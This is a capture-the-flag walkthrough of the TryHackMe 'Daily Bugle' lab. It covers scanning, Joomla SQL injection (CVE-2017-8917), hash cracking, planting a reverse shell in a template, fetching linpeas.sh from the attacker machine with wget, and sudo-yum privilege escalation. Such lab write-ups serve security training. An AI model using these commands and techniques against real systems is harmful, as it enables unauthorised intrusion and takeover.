Daily Bugle Write up

Hello fellow hacker, today I'm going to help you solve the machine Daily bugle on TryHackMe:- https://tryhackme.com/room/dailybugle

So let's begin.

The main objectives of this machine is to:-

• Compromise joomla CMS via SQL injection vulnerability
• Cracking hash using a tool called john the ripper.
• And taking advantage of a binary called 'yum' that allowed for privilege escalation

# First step we begin by running an nmap scan against the target machine:-

nmap -sC -sV <target-machine-IP> -oN nmapscans

-sC :- this tag runs a script scan on target machine

-sV :- this tag detects services and versions of services running on the machine

-oN :- this tag allows us to save the result for future reading.

As the result shows there's:-

PORT       STATE SERVICE

------------------------------------------

22/tcp      open    ssh

80/tcp      open    http

3306/tcp  open    mysql

# There's a port 80 open on this machine that means it has a web server, So let's give it a visit:-

There seems to be a login form on the home page which seems interesting.

and it looks like we can test some SQL injection on this login form.

So I used a tool called sqlmap to automate the sql injection process;

sqlmap -u 'http://<target-IP>/index.php/component/users/?view=login&Itemid=101' --forms --batch

-u :- this tag is used to specify the url on which we want to check for SQLi

--forms :- tells sqlmap that we want to attack a login form

--batch :- this tag answers 'yes' to all the queries that sqlmap has. 

So, from the looks of it the login form on the home page does not seem vulnerable to SQL injection.

There must be another way in.

#Next step is usually to run a directory discovery scan.

So I'll use Gobuster to discover any interesting directories running on the machine:-

gobuster dir -u http://<target-machine-IP>/ -w /usr/share/wordlists/dirbuster/directory-list-medium-2.3.txt -x php,txt

There seems to be an interesting /administrator page, Let's see what it holds.

The administrator page has the joomla login form:-

# From snooping around a little on google I found that this machine has joomla 3.7.0 installed in it.

Now joomla 3.7.0 has a particular SQL injection vulnerability to it according to CVE 2017-8917.

This vulnerability is caused by a component in joomla 3.7.0 code called "com_fields"

You can read about this vulnerability in detail here:- https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html

So by googling around on the internet I found a python script that exploits this particular joomla vulnerability:- https://github.com/stefanlucas/Exploit-Joomla

and voila!

We found user jonah and a password hash for the user jonah.

# The next step in the process is to crack the password hash, for this we will use a tool called john the ripper.

put the hash in a .txt file and use the following command:-

john <name of the file containing hash> --wordlist=<specify wordlist location>

You can use wordlist of your choice, and if not specified john will use it's default wordlist for you which is also pretty good.

Looks like john has cracked a password for us, It also shows some information about the hash, like in this case we were dealing with a bcrypt hash.

# Alright so now we can login on joomla CMS with user jonah.

So now we can play around the CMS and work on how we can get a reverse shell to access files on the target system.

On some manual enumeration, I found the templates/beez3 tab which included .php files.

# I removed all the code from index.php file and inserted the code for a reverse-shell

To execute this reverse shell click on the "template review" button on page'

Now, we'll start a netcat session on our machine and listen on port 9001.

Looks like we got a hit and we have a shell.

# We are user apache on this machine and now we have to work on our way to escalate our privelages.

The next step is further enumerating the machine locally, always remember "enumeration is the key to hack".

# On visiting the /home directory i found out that this machine has a user called jjameson.

It seems we do not have the permission to access the files that jjameson holds, Hence we'll enumerate to find password for this user.

# So, I started an http server on my machine to send an enumerating script called linPEAS.

On my machine (a friendly tip, start the server in the directory that has linpeas.sh):-

python3 -m http.server 8080

On target machine i.e. our reverse-shell :-

wget http://<your-machine-IP>:8080/linpeas.sh 
chmod +x linpeas.sh

(to change permission)

run linpeas and wait for it to display some juicy information.

looks like linpeas found a password in a PHP configuration file:-

# I think we found the password for the user jjameson, so let's try switching user,

Yes, we are now logged in as jjameson and have found the user.txt flag.

# The next step is to escalate privileges to root.

I used command sudo -l to check what commands user jjameson can perform on this machine:-

Ok, so it looks like we can run binary yum without requiring any password.

We'll now go to a website called https://gtfobins.github.io/  which allows us to perform binary exploitation to escalate our privileges root with an ease.

On following these steps, yum allowed us to get root privileges.

We can now grab the root.txt flag from /root/root.txt.